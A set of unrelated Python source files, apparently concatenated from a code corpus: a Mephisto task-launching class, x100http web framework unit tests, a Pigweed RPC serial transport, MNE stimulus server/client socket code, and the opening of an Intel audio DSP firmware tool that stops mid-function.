UNIT_GENERATOR_WAIT_SECONDS = 10
ASSIGNMENT_GENERATOR_WAIT_SECONDS = 0.5
class GeneratorType(enum.Enum):
NONE = 0
UNIT = 1
ASSIGNMENT = 2
class TaskLauncher:
"""
This class is responsible for managing the process of registering
and launching units, including the steps for pre-processing
data and storing them locally for assignments when appropriate.
"""
def __init__(
self,
db: "MephistoDB",
task_run: "TaskRun",
assignment_data_iterator: Iterable[InitializationData],
max_num_concurrent_units: int = 0,
):
"""Prepare the task launcher to get it ready to launch the assignments"""
self.db = db
self.task_run = task_run
self.assignment_data_iterable = assignment_data_iterator
self.assignments: List[Assignment] = []
self.units: List[Unit] = []
self.provider_type = task_run.get_provider().PROVIDER_TYPE
self.UnitClass = task_run.get_provider().UnitClass
self.max_num_concurrent_units = max_num_concurrent_units
self.launched_units: Dict[str, Unit] = {}
self.unlaunched_units: Dict[str, Unit] = {}
self.keep_launching_units: bool = False
self.finished_generators: bool = False
self.assignment_thread_done: bool = True
self.launch_url: Optional[str] = None
self.unlaunched_units_access_condition = threading.Condition()
if isinstance(self.assignment_data_iterable, types.GeneratorType):
self.generator_type = GeneratorType.ASSIGNMENT
self.assignment_thread_done = False
elif max_num_concurrent_units != 0:
self.generator_type = GeneratorType.UNIT
else:
self.generator_type = GeneratorType.NONE
run_dir = task_run.get_run_dir()
os.makedirs(run_dir, exist_ok=True)
logger.debug(f"type of assignment data: {type(self.assignment_data_iterable)}")
self.units_thread: Optional[threading.Thread] = None
self.assignments_thread: Optional[threading.Thread] = None
def _create_single_assignment(self, assignment_data) -> None:
"""Create a single assignment in the database using its read assignment_data"""
task_run = self.task_run
task_args = task_run.get_task_args()
assignment_id = self.db.new_assignment(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
task_run.task_type,
task_run.provider_type,
task_run.sandbox,
)
assignment = Assignment.get(self.db, assignment_id)
assignment.write_assignment_data(assignment_data)
self.assignments.append(assignment)
unit_count = len(assignment_data.unit_data)
for unit_idx in range(unit_count):
unit = self.UnitClass.new(
self.db, assignment, unit_idx, task_args.task_reward
)
self.units.append(unit)
with self.unlaunched_units_access_condition:
self.unlaunched_units[unit.db_id] = unit
def _try_generating_assignments(
self, assignment_data_iterator: Iterator[InitializationData]
) -> None:
"""Try to generate more assignments from the assignments_data_iterator"""
while not self.finished_generators:
try:
data = next(assignment_data_iterator)
self._create_single_assignment(data)
except StopIteration:
self.assignment_thread_done = True
time.sleep(ASSIGNMENT_GENERATOR_WAIT_SECONDS)
def create_assignments(self) -> None:
"""Create an assignment and associated units for the generated assignment data"""
self.keep_launching_units = True
if self.generator_type != GeneratorType.ASSIGNMENT:
for data in self.assignment_data_iterable:
self._create_single_assignment(data)
else:
assert isinstance(
self.assignment_data_iterable, types.GeneratorType
), "Must have assignment data generator for this"
self.assignments_thread = threading.Thread(
target=self._try_generating_assignments,
args=(self.assignment_data_iterable,),
name="assignment-generator",
)
self.assignments_thread.start()
def generate_units(self):
"""units generator which checks that only 'max_num_concurrent_units' running at the same time,
i.e. in the LAUNCHED or ASSIGNED states"""
while self.keep_launching_units:
units_id_to_remove = []
for db_id, unit in self.launched_units.items():
status = unit.get_status()
if (
status != AssignmentState.LAUNCHED
and status != AssignmentState.ASSIGNED
):
units_id_to_remove.append(db_id)
for db_id in units_id_to_remove:
self.launched_units.pop(db_id)
num_avail_units = self.max_num_concurrent_units - len(self.launched_units)
num_avail_units = (
len(self.unlaunched_units)
if self.max_num_concurrent_units == 0
else num_avail_units
)
units_id_to_remove = []
for i, item in enumerate(self.unlaunched_units.items()):
db_id, unit = item
if i < num_avail_units:
self.launched_units[unit.db_id] = unit
units_id_to_remove.append(db_id)
yield unit
else:
break
with self.unlaunched_units_access_condition:
for db_id in units_id_to_remove:
self.unlaunched_units.pop(db_id)
time.sleep(UNIT_GENERATOR_WAIT_SECONDS)
if not self.unlaunched_units:
break
def _launch_limited_units(self, url: str) -> None:
"""use units' generator to launch limited number of units according to (max_num_concurrent_units)"""
# Continue launching if we haven't pulled the plug, so long as there are currently
# units to launch, or more may come in the future.
while not self.finished_generators and (
len(self.unlaunched_units) > 0 or not self.assignment_thread_done
):
for unit in self.generate_units():
if unit is None:
break
unit.launch(url)
if self.generator_type == GeneratorType.NONE:
break
self.finished_generators = True
def launch_units(self, url: str) -> None:
"""launch any units registered by this TaskLauncher"""
self.launch_url = url
self.units_thread = threading.Thread(
target=self._launch_limited_units, args=(url,), name="unit-generator"
)
self.units_thread.start()
def launch_evaluation_unit(
self, unit_data: Dict[str, Any], unit_type_index: int
) -> "Unit":
"""Launch a specific evaluation unit, used for quality control"""
assert (
self.launch_url is not None
), "Cannot launch an evaluation unit before launching others"
task_run = self.task_run
task_args = task_run.get_task_args()
assignment_id = self.db.new_assignment(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
task_run.task_type,
task_run.provider_type,
task_run.sandbox,
)
data = InitializationData(unit_data, [{}])
assignment = Assignment.get(self.db, assignment_id)
assignment.write_assignment_data(data)
self.assignments.append(assignment)
evaluation_unit = self.UnitClass.new(
self.db, assignment, unit_type_index, task_args.task_reward
)
evaluation_unit.launch(self.launch_url)
return evaluation_unit
def launch_screening_unit(self, unit_data: Dict[str, Any]) -> "Unit":
"""Launch a screening unit, which should never return to the pool"""
return self.launch_evaluation_unit(unit_data, SCREENING_UNIT_INDEX)
def launch_gold_unit(self, unit_data: Dict[str, Any]) -> "Unit":
"""Launch a screening unit, which should never return to the pool"""
return self.launch_evaluation_unit(unit_data, GOLD_UNIT_INDEX)
def get_assignments_are_all_created(self) -> bool:
return self.assignment_thread_done
def expire_units(self) -> None:
"""Clean up all units on this TaskLauncher"""
self.keep_launching_units = False
self.finished_generators = True
for unit in tqdm(self.units):
try:
unit.expire()
except Exception as e:
logger.exception(
f"Warning: failed to expire unit {unit.db_id}. Stated error: {e}",
exc_info=True,
)
def shutdown(self) -> None:
"""Clean up running threads for generating assignments and units"""
self.assignment_thread_done = True
self.keep_launching_units = False
self.finished_generators = True
if self.assignments_thread is not None:
self.assignments_thread.join()
if self.units_thread is not None:
self.units_thread.join()
|
tests.py
|
import unittest
import time
import urllib.request
from multiprocessing import Process
from x100http import X100HTTP, X100Response
import requests
class UploadHandler:
def upload_start(self, req):
self.content = "start"
def upload_process(self, key, line):
self.content += line.decode()
def upload_finish(self, req):
return "upload succ, content = " + self.content
def get_simple(req):
remote_ip = req.get_remote_ip()
response = "<html><body>hello, " + remote_ip + "</body></html>"
return response
def get_via_class(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.set_body("<html><body>hello, " + remote_ip + "</body></html>")
return response
def get_via_class_directly(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.body = (
"<html><body>hello, " + remote_ip + "</body></html>").encode()
return response
def get_args(req):
myval = req.get_arg("myget_key")
return "hello" + myval
def get_query_string(req):
return "hello" + req.get_query_string()
def get_custom_header(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.set_header("X-My-Header", "My-Value")
response.set_body("<html><body>hello, " + remote_ip + "</body></html>")
return response
def get_custom_header_directly(req):
remote_ip = req.get_remote_ip()
response = X100Response()
response.headers["X-My-Header"] = "My-Value"
response.body = (
"<html><body>hello, " + remote_ip + "</body></html>").encode()
return response
def post_simple(req):
return "hello, world!" + req.get_body()
def post_urlencode(req):
return "hello, world!" + req.get_arg('mykey')
def regex_get(req):
arg_first = req.get_arg("arg_first")
arg_second = req.get_arg("arg_second")
return "regex_get: " + arg_first + ", " + arg_second
def regex_get_in_url(req):
arg_first = req.get_arg_in_url("arg_first")
arg_second = req.get_arg_in_url("arg_second")
return "regex_get: " + arg_first + ", " + arg_second
def regex_get_more_arg(req):
arg_first = req.get_arg("arg_first")
arg_second = req.get_arg("abc")
return "regex_get: " + arg_first + ", " + arg_second
class TestSimple(unittest.TestCase):
@classmethod
def setUpClass(ConnectionHolder):
app = X100HTTP()
app.get("/", get_simple)
app.get("/get_via_class", get_via_class)
app.get("/get_via_class_directly", get_via_class_directly)
app.get("/get_args", get_args)
app.get("/get_query_string", get_query_string)
app.get("/get_custom_header", get_custom_header)
app.get("/get_custom_header_directly", get_custom_header_directly)
app.post("/post_simple", post_simple)
app.post("/post_urlencode", post_urlencode)
app.upload("/upload_simple", UploadHandler)
app.get("/one_dir/<arg_first>_<arg_second>.py", regex_get)
app.get("/<arg_first>_<arg_second>.py", regex_get_in_url)
app.get("/one_dir/<arg_first>.py", regex_get_more_arg)
app.static("/static/test/", "tests/sta/")
ConnectionHolder.p = Process(target=app.run, args=('127.0.0.1', 8080))
ConnectionHolder.p.start()
@classmethod
def tearDownClass(ConnectionHolder):
ConnectionHolder.p.terminate()
def test_static(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/tests/test.html', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('Content-Type'), 'text/html')
self.assertEqual(f.read().decode(), "this is test.html\n")
def test_static_simple(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/static/test/static_test.html', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('Content-Type'), 'text/html')
self.assertEqual(f.read().decode(), "this is test for static html\n")
def test_get_root(self):
req = urllib.request.Request(url='http://127.0.0.1:8080', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_root_slash(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_via_class(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_via_class', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_via_class_directly(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_via_class_directly', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_args(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_args?myget_key=myget_value', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hellomyget_value")
def test_get_query_string(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_query_string?myget_key=myget_value', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hellomyget_key=myget_value")
def test_get_custom_header(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_custom_header', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('X-My-Header'), 'My-Value')
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_get_via_class_directly(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/get_custom_header_directly', method='GET')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.info().get('X-My-Header'), 'My-Value')
self.assertEqual(
f.read().decode(), "<html><body>hello, 127.0.0.1</body></html>")
def test_post_simple(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/post_simple', data=b'data', method='POST')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hello, world!data")
def test_post_urlencode(self):
req = urllib.request.Request(
url='http://127.0.0.1:8080/post_urlencode', data=b'mykey=myvalue', method='POST')
f = urllib.request.urlopen(req)
self.assertEqual(f.status, 200)
self.assertEqual(f.read().decode(), "hello, world!myvalue")
def test_upload_simple(self):
f = open('tests/test.html', 'rb')
r = requests.post(
'http://127.0.0.1:8080/upload_simple', files={'file': f})
f.close()
self.assertEqual(r.status_code, 200)
self.assertEqual(
r.text, "upload succ, content = startthis is test.html\n\r\n")
def test_regex_get(self):
resp = requests.get('http://127.0.0.1:8080/one_dir/hello_x100http.py')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.text, "regex_get: hello, x100http")
def test_regex_get_404(self):
resp = requests.get('http://127.0.0.1:8080/one_dir/hello_x100http.pl')
self.assertEqual(resp.status_code, 404)
def test_regex_get_in_url(self):
resp = requests.get('http://127.0.0.1:8080/hello_x100http.py')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.text, "regex_get: hello, x100http")
def test_regex_get_more_arg(self):
resp = requests.get('http://127.0.0.1:8080/one_dir/hello.py?abc=def')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.text, "regex_get: hello, def")
if __name__ == '__main__':
unittest.main()
|
pigweed_rpc_transport.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pigweed RPC transport class."""
import fcntl
import queue
import select
import threading
import types
from typing import Any, Collection, Dict, Optional, Tuple
from gazoo_device import errors
from gazoo_device import gdm_logger
from gazoo_device.switchboard.transports import transport_base
import serial
# TODO(b/181734752): Remove conditional imports of Pigweed
try:
# pylint: disable=g-import-not-at-top
# pytype: disable=import-error
import pw_rpc
from pw_rpc import callback_client
from pw_hdlc import rpc
from pw_hdlc import decode
from pw_protobuf_compiler import python_protos
# pytype: enable=import-error
PIGWEED_IMPORT = True
except ImportError:
pw_rpc = None
callback_client = None
rpc = None
decode = None
python_protos = None
PIGWEED_IMPORT = False
_STDOUT_ADDRESS = 1
_DEFAULT_ADDRESS = ord("R")
_JOIN_TIMEOUT_SEC = 1 # seconds
_SELECT_TIMEOUT_SEC = 0.1 # seconds
logger = gdm_logger.get_logger()
class PwHdlcRpcClient:
"""Pigweed HDLC RPC Client.
Adapted from https://pigweed.googlesource.com/pigweed/pigweed/+/refs/heads/master/pw_hdlc/py/pw_hdlc/rpc.py. # pylint: disable=line-too-long
"""
def __init__(self,
serial_instance: serial.Serial,
protobufs: Collection[types.ModuleType]):
"""Creates an RPC client configured to communicate using HDLC.
Args:
serial_instance: Serial interface instance.
protobufs: Proto modules.
"""
if not PIGWEED_IMPORT:
raise errors.DependencyUnavailableError(
"Pigweed python packages are not available in this environment.")
protos = python_protos.Library.from_paths(protobufs)
client_impl = callback_client.Impl()
channels = rpc.default_channels(serial_instance.write)
self._client = pw_rpc.Client.from_modules(client_impl,
channels,
protos.modules())
self._serial = serial_instance
self._stop_event = threading.Event()
self._worker = None
self.log_queue = queue.Queue()
def is_alive(self) -> bool:
"""Returns true if the worker thread has started."""
return self._worker is not None and self._worker.is_alive()
def start(self) -> None:
"""Creates and starts the worker thread if it hasn't been created."""
if self._stop_event.is_set():
self._stop_event.clear()
if self._worker is None:
self._worker = threading.Thread(target=self.read_and_process_data)
self._worker.start()
def close(self) -> None:
"""Sets the threading event and joins the worker thread."""
self._stop_event.set()
if self._worker is not None:
self._worker.join(timeout=_JOIN_TIMEOUT_SEC)
if self._worker.is_alive():
raise errors.DeviceError(
f"The child thread failed to join after {_JOIN_TIMEOUT_SEC} seconds"
)
self._worker = None
def rpcs(self, channel_id: Optional[int] = None) -> Any:
"""Returns object for accessing services on the specified channel.
Args:
channel_id: None or RPC channel id.
Returns:
RPC instance over the specificed channel.
"""
if channel_id is None:
return next(iter(self._client.channels())).rpcs
return self._client.channel(channel_id).rpcs
def read_and_process_data(self) -> None:
"""Continuously reads and handles HDLC frames."""
decoder = decode.FrameDecoder()
while not self._stop_event.is_set():
readfds, _, _ = select.select([self._serial], [], [], _SELECT_TIMEOUT_SEC)
for fd in readfds:
try:
data = fd.read()
except Exception: # pylint: disable=broad-except
logger.exception(
"Exception occurred when reading in PwHdlcRpcClient thread.")
data = None
if data:
for frame in decoder.process_valid_frames(data):
self._handle_frame(frame)
def _handle_rpc_packet(self, frame: Any) -> None:
"""Handler for processing HDLC frame.
Args:
frame: HDLC frame packet.
"""
if not self._client.process_packet(frame.data):
logger.error(f"Packet not handled by RPC client: {frame.data}")
def _push_to_log_queue(self, frame: Any) -> None:
"""Pushes the HDLC log in frame into the log queue.
Args:
frame: HDLC frame packet.
"""
self.log_queue.put(frame.data + b"\n")
def _handle_frame(self, frame: Any) -> None:
"""Private method for processing HDLC frame.
Args:
frame: HDLC frame packet.
"""
try:
if not frame.ok():
return
if frame.address == _DEFAULT_ADDRESS:
self._handle_rpc_packet(frame)
elif frame.address == _STDOUT_ADDRESS:
self._push_to_log_queue(frame)
else:
logger.warning(f"Unhandled frame for address {frame.address}: {frame}")
except Exception: # pylint: disable=broad-except
logger.exception("Exception occurred in PwHdlcRpcClient.")
class PigweedRPCTransport(transport_base.TransportBase):
"""Performs transport communication using the Pigweed RPC to end devices."""
def __init__(self,
comms_address: str,
protobufs: Collection[types.ModuleType],
baudrate: int,
auto_reopen: bool = True,
open_on_start: bool = True):
super().__init__(
auto_reopen=auto_reopen,
open_on_start=open_on_start)
self.comms_address = comms_address
self._protobufs = protobufs
self._serial = serial.Serial()
self._serial.port = comms_address
self._serial.baudrate = baudrate
self._serial.timeout = 0.01
self._hdlc_client = PwHdlcRpcClient(self._serial, protobufs)
def is_open(self) -> bool:
"""Returns True if the PwRPC transport is connected to the target.
Returns:
True if transport is open, False otherwise.
"""
return self._serial.isOpen() and self._hdlc_client.is_alive()
def _close(self) -> None:
"""Closes the PwRPC transport."""
self._hdlc_client.close()
fcntl.flock(self._serial.fileno(), fcntl.LOCK_UN)
self._serial.close()
def _open(self) -> None:
"""Opens the PwRPC transport."""
self._serial.open()
fd = self._serial.fileno()
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
self._hdlc_client.start()
def _read(self, size: int, timeout: float) -> bytes:
"""Returns Pigweed log from the HDLC channel 1.
Args:
size: Not used.
timeout: Maximum seconds to wait to read bytes.
Returns:
bytes read from transport or None if no bytes were read
"""
# Retrieving logs from queue doesn't support size configuration.
del size
try:
return self._hdlc_client.log_queue.get(timeout=timeout)
except queue.Empty:
return b""
def _write(self, data: str, timeout: Optional[float] = None) -> int:
"""Dummy method for Pigweed RPC.
Declared to pass the inheritance check of TransportBase.
Args:
data: Not used.
timeout: Not used.
Returns:
int: Not used.
"""
return 0
def rpc(self,
service_name: str,
event_name: str,
**kwargs: Dict[str, Any]) -> Tuple[bool, bytes]:
"""RPC call to the Matter endpoint with given service and event name.
Args:
service_name: PwRPC service name.
event_name: Event name in the given service instance.
**kwargs: Arguments for the event method.
Returns:
(RPC ack value, RPC encoded payload in bytes)
"""
client_channel = self._hdlc_client.rpcs().chip.rpc
service = getattr(client_channel, service_name)
event = getattr(service, event_name)
ack, payload = event(**kwargs)
return ack.ok(), payload.SerializeToString()
def echo_rpc(self, msg: str) -> Tuple[bool, str]:
"""Calls the Echo RPC endpoint.
Sends a message to the echo endpoint and returns the response back. Uses a
different namespace (pw.rpc) than the rest of Matter endpoints (chip.rpc).
Only used by the Pigweed Echo example app:
https://github.com/project-chip/connectedhomeip/tree/master/examples/pigweed-app/esp32#chip-esp32-pigweed-example-application
Args:
msg: Echo message to send.
Returns:
(RPC ack value, Echo message)
"""
client_channel = self._hdlc_client.rpcs().pw.rpc
echo_service = client_channel.EchoService
ack, payload = echo_service.Echo(msg=msg)
return ack.ok(), payload.msg
|
stim_server_client.py
|
# Author: Mainak Jas <mainak@neuro.hut.fi>
# License: BSD (3-clause)
import queue
import time
import socket
import socketserver
import threading
import numpy as np
from ..utils import logger, verbose
class _ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""Create a threaded TCP server.
Parameters
----------
server_address : str
Address on which server is listening
request_handler_class : subclass of BaseRequestHandler
_TriggerHandler which defines the handle method
stim_server : instance of StimServer
object of StimServer class
"""
def __init__(self, server_address, request_handler_class,
stim_server): # noqa: D102
# Basically, this server is the same as a normal TCPServer class
# except that it has an additional attribute stim_server
# Create the server and bind it to the desired server address
socketserver.TCPServer.__init__(self, server_address,
request_handler_class,
False)
self.stim_server = stim_server
class _TriggerHandler(socketserver.BaseRequestHandler):
"""Request handler on the server side."""
def handle(self):
"""Handle requests on the server side."""
self.request.settimeout(None)
while self.server.stim_server._running:
data = self.request.recv(1024) # clip input at 1Kb
data = data.decode() # need to turn it into a string (Py3k)
if data == 'add client':
# Add stim_server._client
client_id = self.server.stim_server \
._add_client(self.client_address[0],
self)
# Instantiate queue for communication between threads
# Note: new queue for each handler
if not hasattr(self, '_tx_queue'):
self._tx_queue = queue.Queue()
self.request.sendall("Client added".encode('utf-8'))
# Mark the client as running
for client in self.server.stim_server._clients:
if client['id'] == client_id:
client['running'] = True
elif data == 'get trigger':
# Pop triggers and send them
if (self._tx_queue.qsize() > 0 and
self.server.stim_server, '_clients'):
trigger = self._tx_queue.get()
self.request.sendall(str(trigger).encode('utf-8'))
else:
self.request.sendall("Empty".encode('utf-8'))
class StimServer(object):
"""Stimulation Server.
Server to communicate with StimClient(s).
Parameters
----------
port : int
The port to which the stimulation server must bind to.
n_clients : int
The number of clients which will connect to the server.
See Also
--------
StimClient
"""
def __init__(self, port=4218, n_clients=1): # noqa: D102
# Start a threaded TCP server, binding to localhost on specified port
self._data = _ThreadedTCPServer(('', port),
_TriggerHandler, self)
self.n_clients = n_clients
def __enter__(self): # noqa: D105
# This is done to avoid "[Errno 98] Address already in use"
self._data.allow_reuse_address = True
self._data.server_bind()
self._data.server_activate()
# Start a thread for the server
self._thread = threading.Thread(target=self._data.serve_forever)
# Ctrl-C will cleanly kill all spawned threads
# Once the main thread exits, other threads will exit
self._thread.daemon = True
self._thread.start()
self._running = False
self._clients = list()
return self
def __exit__(self, type, value, traceback): # noqa: D105
self.shutdown()
@verbose
def start(self, timeout=np.inf, verbose=None):
"""Start the server.
Parameters
----------
timeout : float
Maximum time to wait for clients to be added.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
# Start server
if not self._running:
logger.info('RtServer: Start')
self._running = True
start_time = time.time() # init delay counter.
# wait till n_clients are added
while (len(self._clients) < self.n_clients):
current_time = time.time()
if (current_time > start_time + timeout):
raise StopIteration
time.sleep(0.1)
@verbose
def _add_client(self, ip, sock, verbose=None):
"""Add client.
Parameters
----------
ip : str
IP address of the client.
sock : instance of socket.socket
The client socket.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
logger.info("Adding client with ip = %s" % ip)
client = dict(ip=ip, id=len(self._clients), running=False, socket=sock)
self._clients.append(client)
return client['id']
@verbose
def shutdown(self, verbose=None):
"""Shutdown the client and server.
Parameters
----------
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
logger.info("Shutting down ...")
# stop running all the clients
if hasattr(self, '_clients'):
for client in self._clients:
client['running'] = False
self._running = False
self._data.shutdown()
self._data.server_close()
self._data.socket.close()
@verbose
def add_trigger(self, trigger, verbose=None):
"""Add a trigger.
Parameters
----------
trigger : int
The trigger to be added to the queue for sending to StimClient.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
See Also
--------
StimClient.get_trigger
"""
for client in self._clients:
client_id = client['id']
logger.info("Sending trigger %d to client %d"
% (trigger, client_id))
client['socket']._tx_queue.put(trigger)
class StimClient(object):
"""Stimulation Client.
Client to communicate with StimServer
Parameters
----------
host : str
Hostname (or IP address) of the host where StimServer is running.
port : int
Port to use for the connection.
timeout : float
Communication timeout in seconds.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
See Also
--------
StimServer
"""
@verbose
def __init__(self, host, port=4218, timeout=5.0,
verbose=None): # noqa: D102
try:
logger.info("Setting up client socket")
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(timeout)
self._sock.connect((host, port))
logger.info("Establishing connection with server")
data = "add client".encode('utf-8')
n_sent = self._sock.send(data)
if n_sent != len(data):
raise RuntimeError('Could not communicate with server')
resp = self._sock.recv(1024).decode() # turn bytes into str (Py3k)
if resp == 'Client added':
logger.info("Connection established")
else:
raise RuntimeError('Client not added')
except Exception:
raise RuntimeError('Setting up acquisition <-> stimulation '
'computer connection (host: %s '
'port: %d) failed. Make sure StimServer '
'is running.' % (host, port))
def close(self):
"""Close the socket object."""
self._sock.close()
@verbose
def get_trigger(self, timeout=5.0, verbose=None):
"""Get triggers from StimServer.
Parameters
----------
timeout : float
maximum time to wait for a valid trigger from the server
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
See Also
--------
StimServer.add_trigger
"""
start_time = time.time() # init delay counter. Will stop iterations
while True:
try:
current_time = time.time()
# Raise timeout error
if current_time > (start_time + timeout):
logger.info("received nothing")
return None
self._sock.send("get trigger".encode('utf-8'))
trigger = self._sock.recv(1024)
if trigger != 'Empty':
logger.info("received trigger %s" % str(trigger))
return int(trigger)
except RuntimeError as err:
logger.info('Cannot receive triggers: %s' % (err))
|
cavstool_server.py
|
#!/usr/bin/env python3
# Copyright(c) 2022 Intel Corporation. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
import os
import sys
import struct
import logging
import asyncio
import time
import subprocess
import ctypes
import mmap
import argparse
import socketserver
import threading
import netifaces
# Global variable use to sync between log and request services.
# When it is true, the adsp is able to start running.
start_output = False
lock = threading.Lock()
HOST = None
PORT_LOG = 9999
PORT_REQ = PORT_LOG + 1
BUF_SIZE = 4096
CMD_LOG_START = "start_log"
CMD_LOG_STOP = "stop_log"
CMD_DOWNLOAD = "download"
logging.basicConfig()
log = logging.getLogger("cavs-fw")
log.setLevel(logging.INFO)
PAGESZ = 4096
HUGEPAGESZ = 2 * 1024 * 1024
HUGEPAGE_FILE = "/dev/hugepages/cavs-fw-dma.tmp."
# SRAM windows. Each appears in a 128k region starting at 512k.
#
# Window 0 is the FW_STATUS area, and 4k after that the IPC "outbox"
# Window 1 is the IPC "inbox" (host-writable memory, just 384 bytes currently)
# Window 2 is unused by this script
# Window 3 is winstream-formatted log output
OUTBOX_OFFSET = (512 + (0 * 128)) * 1024 + 4096
INBOX_OFFSET = (512 + (1 * 128)) * 1024
WINSTREAM_OFFSET = (512 + (3 * 128)) * 1024
class HDAStream:
# creates an hda stream with at 2 buffers of buf_len
def __init__(self, stream_id: int):
self.stream_id = stream_id
self.base = hdamem + 0x0080 + (stream_id * 0x20)
log.info(f"Mapping registers for hda stream {self.stream_id} at base {self.base:x}")
self.hda = Regs(hdamem)
self.hda.GCAP = 0x0000
self.hda.GCTL = 0x0008
self.hda.DPLBASE = 0x0070
self.hda.DPUBASE = 0x0074
self.hda.SPBFCH = 0x0700
self.hda.SPBFCTL = 0x0704
self.hda.PPCH = 0x0800
self.hda.PPCTL = 0x0804
self.hda.PPSTS = 0x0808
self.hda.SPIB = 0x0708 + stream_id*0x08
self.hda.freeze()
self.regs = Regs(self.base)
self.regs.CTL = 0x00
self.regs.STS = 0x03
self.regs.LPIB = 0x04
self.regs.CBL = 0x08
self.regs.LVI = 0x0c
self.regs.FIFOW = 0x0e
self.regs.FIFOS = 0x10
self.regs.FMT = 0x12
self.regs.FIFOL= 0x14
self.regs.BDPL = 0x18
self.regs.BDPU = 0x1c
self.regs.freeze()
self.dbg0 = Regs(hdamem + 0x0084 + (0x20*stream_id))
self.dbg0.DPIB = 0x00
self.dbg0.EFIFOS = 0x10
self.dbg0.freeze()
self.reset()
def __del__(self):
self.reset()
def config(self, buf_len: int):
log.info(f"Configuring stream {self.stream_id}")
self.buf_len = buf_len
log.info("Allocating huge page and setting up buffers")
self.mem, self.hugef, self.buf_list_addr, self.pos_buf_addr, self.n_bufs = self.setup_buf(buf_len)
log.info("Setting buffer list, length, and stream id and traffic priority bit")
self.regs.CTL = ((self.stream_id & 0xFF) << 20) | (1 << 18) # must be set to something other than 0?
self.regs.BDPU = (self.buf_list_addr >> 32) & 0xffffffff
self.regs.BDPL = self.buf_list_addr & 0xffffffff
self.regs.CBL = buf_len
self.regs.LVI = self.n_bufs - 1
self.debug()
log.info(f"Configured stream {self.stream_id}")
def write(self, data):
bufl = min(len(data), self.buf_len)
log.info(f"Writing data to stream {self.stream_id}, len {bufl}, SPBFCTL {self.hda.SPBFCTL:x}, SPIB {self.hda.SPIB}")
self.mem[0:bufl] = data[0:bufl]
self.mem[bufl:bufl+bufl] = data[0:bufl]
self.hda.SPBFCTL |= (1 << self.stream_id)
self.hda.SPIB += bufl
log.info(f"Wrote data to stream {self.stream_id}, SPBFCTL {self.hda.SPBFCTL:x}, SPIB {self.hda.SPIB}")
def start(self):
log.info(f"Starting stream {self.stream_id}, CTL {self.regs.CTL:x}")
self.regs.CTL |= 2
log.info(f"Started stream {self.stream_id}, CTL {self.regs.CTL:x}")
def stop(self):
log.info(f"Stopping stream {self.stream_id}, CTL {self.regs.CTL:x}")
self.regs.CTL &= 2
time.sleep(0.1)
self.regs.CTL |= 1
log.info(f"Stopped stream {self.stream_id}, CTL {self.regs.CTL:x}")
def setup_buf(self, buf_len: int):
(mem, phys_addr, hugef) = map_phys_mem(self.stream_id)
log.info(f"Mapped 2M huge page at 0x{phys_addr:x} for buf size ({buf_len})")
